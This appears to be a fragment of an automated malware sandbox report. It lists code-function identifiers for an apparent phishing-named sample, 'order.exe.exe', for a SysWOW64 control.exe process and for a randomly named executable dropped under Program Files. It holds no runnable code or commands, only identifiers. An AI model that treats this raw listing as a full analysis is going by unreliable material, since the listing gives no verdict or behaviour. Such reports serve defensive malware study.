      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1A15301_2_1F1A1530
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F2525191_2_1F252519
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1695281_2_1F169528
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F241D1B1_2_1F241D1B
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F180D401_2_1F180D40
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F24E5811_2_1F24E581
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F22E58A1_2_1F22E58A
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F231DE31_2_1F231DE3
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F24D5D21_2_1F24D5D2
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F23FDDB1_2_1F23FDDB
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F23F42B1_2_1F23F42B
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1A14101_2_1F1A1410
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F19740C1_2_1F19740C
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B547E1_2_1F1B547E
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F2434901_2_1F243490
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F251C9F1_2_1F251C9F
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F252C9A1_2_1F252C9A
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F2444EF1_2_1F2444EF
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F24DCC51_2_1F24DCC5
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1633141_2_1F163314
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1AFB401_2_1F1AFB40
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B4B961_2_1F1B4B96
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B63C21_2_1F1B63C2
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F18EBE01_2_1F18EBE0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F240A021_2_1F240A02
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B523D1_2_1F1B523D
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F25E2141_2_1F25E214
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B4A5B1_2_1F1B4A5B
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1A42B01_2_1F1A42B0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F251A991_2_1F251A99
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F2522DD1_2_1F2522DD
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B71101_2_1F1B7110
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1D99061_2_1F1D9906
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B594B1_2_1F1B594B
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F25D9BE1_2_1F25D9BE
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B61801_2_1F1B6180
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F2519E21_2_1F2519E2
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F2461DF1_2_1F2461DF
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B98101_2_1F1B9810
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F24D0161_2_1F24D016
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B00211_2_1F1B0021
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1BE0201_2_1F1BE020
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B10701_2_1F1B1070
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F2318B61_2_1F2318B6
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F19A0801_2_1F19A080
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F2528E81_2_1F2528E8
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B48CB1_2_1F1B48CB
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_049134908_2_04913490
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04922C9A8_2_04922C9A
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04921C9F8_2_04921C9F
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0491DCC58_2_0491DCC5
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_049144EF8_2_049144EF
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0486740C8_2_0486740C
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048714108_2_04871410
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0490F42B8_2_0490F42B
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0488547E8_2_0488547E
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048FE58A8_2_048FE58A
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0491E5818_2_0491E581
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04839D958_2_04839D95
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0491D5D28_2_0491D5D2
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0490FDDB8_2_0490FDDB
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04901DE38_2_04901DE3
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04911D1B8_2_04911D1B
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_049225198_2_04922519
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048FC53F8_2_048FC53F
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048715308_2_04871530
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04850D408_2_04850D40
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04913E968_2_04913E96
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_049226F88_2_049226F8
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048866118_2_04886611
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048776408_2_04877640
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04884E618_2_04884E61
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0491CE668_2_0491CE66
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04885E708_2_04885E70
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_049127828_2_04912782
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048757908_2_04875790
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048567D08_2_048567D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04921FCE8_2_04921FCE
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_049217468_2_04921746
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0486A0808_2_0486A080
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_049018B68_2_049018B6
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048848CB8_2_048848CB
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_049228E88_2_049228E8
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0491D0168_2_0491D016
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048898108_2_04889810
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0488E0208_2_0488E020
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048800218_2_04880021
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048810708_2_04881070
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048861808_2_04886180
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0492D9BE8_2_0492D9BE
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_049161DF8_2_049161DF
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_049219E28_2_049219E2
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048A99068_2_048A9906
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048871108_2_04887110
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0488594B8_2_0488594B
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04921A998_2_04921A99
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048742B08_2_048742B0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_049222DD8_2_049222DD
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0492E2148_2_0492E214
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04910A028_2_04910A02
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0488523D8_2_0488523D
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04884A5B8_2_04884A5B
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04884B968_2_04884B96
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048863C28_2_048863C2
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0485EBE08_2_0485EBE0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048333148_2_04833314
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0487FB408_2_0487FB40
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0057DA8B8_2_0057DA8B
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00562D908_2_00562D90
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00562D878_2_00562D87
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00569F5F8_2_00569F5F
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00569F608_2_00569F60
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00562FB08_2_00562FB0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F3B174620_2_1F3B1746
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F30579020_2_1F305790
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F3A278220_2_1F3A2782
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F3B1FCE20_2_1F3B1FCE
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F2E67D020_2_1F2E67D0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F316611